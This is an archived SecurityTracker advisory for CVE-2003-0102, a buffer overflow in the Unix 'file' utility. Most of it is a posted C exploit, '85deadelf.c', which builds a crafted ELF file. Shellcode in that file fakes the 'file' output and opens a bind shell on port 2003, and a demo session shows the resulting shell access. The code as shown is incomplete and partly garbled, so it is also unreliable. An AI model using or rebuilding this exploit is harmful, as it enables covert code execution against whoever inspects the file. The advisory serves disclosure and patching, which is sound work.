Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Generic)  >   file Vendors:   Darwin, Ian F.
(Exploit Code is Available) Re: 'file' Utility Buffer Overflow May Let Local Users Gain Elevated Privileges in Certain Cases
SecurityTracker Alert ID:  1006236
SecurityTracker URL:
CVE Reference:   CVE-2003-0102   (Links to External Site)
Date:  Mar 7 2003
Impact:   Execution of arbitrary code via local system, User access via local system
Exploit Included:  Yes  
Version(s): 3.39 and prior versions
Description:   A buffer overflow vulnerability was reported in file(1). A local user may be able to get a local user to execute arbitrary code.

iDEFENSE reported that the flaw resides in a doshn() function call in the 'readelf.c' file. If a local user can get another target local user to invoke the file(1) command to examine a specially crafted malicious file, arbitrary code may be executed with the privileges of the target user.

Crazy Einstein has provided a demonstration exploit, available in the Source Message.

Impact:   A local user may be able to cause arbitrary code to be executed by a target user with the privileges of the target user.
Solution:   The vendor has released a fixed version (3.41), available at:

Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry is a follow-up to the message listed below.
Mar 4 2003 'file' Utility Buffer Overflow May Let Local Users Gain Elevated Privileges in Certain Cases

 Source Message Contents

Subject:  file(1) exploit code

Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

Just for fun... ;)

Do you Yahoo!?
Yahoo! Tax Center - forms, calculators, tips, more
Content-Type: text/plain; name="85deadelf.c"
Content-Description: 85deadelf.c
Content-Disposition: inline; filename="85deadelf.c"

\   __________________
/   Black Sand Project
\   __________________
\   Created by CrZ [] LimpidByte [] /06.03.2003/
\   Bug discovered by iDEFENCE:
\   program name: DEADELF
\   description: Exploit for file program <= 3.39
\   info: program create file-exploit and when you 
/   make "file /path/to/this/file-exploit" shell
\   will open on 2003 port.
\   Usage: ./85deadelf <file-exploit> [return address]
\   Example of work:
\	[crz@blacksand crz]$ gcc -o 85deadelf 85deadelf.c
/	[crz@blacksand crz]$ ./85deadelf deadelf
\	[+] Creating a evil file deadelf!
/	[+] Using address of shellcode = 0xbfffbd40
\	[crz@blacksand crz]$ file deadelf
/	File: ASCII text
\	[crz@blacksand crz]$ telnet localhost 2003
/	Trying
\	Connected to blacksand (
/	Escape character is '^]'.
\	id;
/	uid=500(crz) gid=500(crz) groups=500(crz)
\	: command not found
/	exit;
\	Connection closed by foreign host.
/	[crz@blacksand crz]$
/   Tested against: file-3.37 (RedHat8.0)
\		    file-3.38 (RedHat8.0)

#include <fcntl.h>
#include <elf.h>
#include <stdio.h>

void usage(char *prog) {

	printf("\nCreated by CrZ [] Limpid Byte []\n");
	printf("Usage: %s <name of evil file> [return address]\n\n",prog);

int main(int argc, char **argv) {
\   a simple shellcode that show fake result of file program & bind
/   shell on 2003 port by CrZ
char shellcode[]=
	"\x31\xc0\x31\xdb\x53\xb3\x01\x50" /* write(1,"File: ASCII text");*/
        /* bind shell on 2003 port */
	int fd,i;
	Elf32_Ehdr elfhdr;
	long xret=0xbfffbd40;
	char *evilfile="bl00mps";
	char tmp[100];
	if(!argv[1]) usage(argv[0]);
	else evilfile=argv[1];
	if(argv[2]) sscanf(argv[2],"0x%x",&xret);
	printf("[+] Creating a evil file %s!\n",evilfile);
	printf("[+] Using address of shellcode = 0x%x\n",xret);	

	bzero(&elfhdr,sizeof elfhdr );
	elfhdr.e_type=1; //type should by NOT ET_CORE (4) & NOT ET_EXEC (2)
	sprintf(elfhdr.e_ident,"\x7f\x45\x4c\x46\x01\x01\x01"); //ELF32 FORMAT
	elfhdr.e_phentsize=0xfff; //define size for read()
	elfhdr.e_phnum=1; //this is for stop for() loop when read()
	elfhdr.e_shentsize=0xfff; //define size for read()
	elfhdr.e_shnum=1; //this is for stop for() loop when read()
	for(i=0;i<20;i++) write(fd,&xret,4); //write new return address
	for(i=0;i<6000;i++) write(fd,"\x90",1); //write nops
	write(fd,&shellcode,sizeof shellcode); //write shellcode


	return 0;	



Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, LLC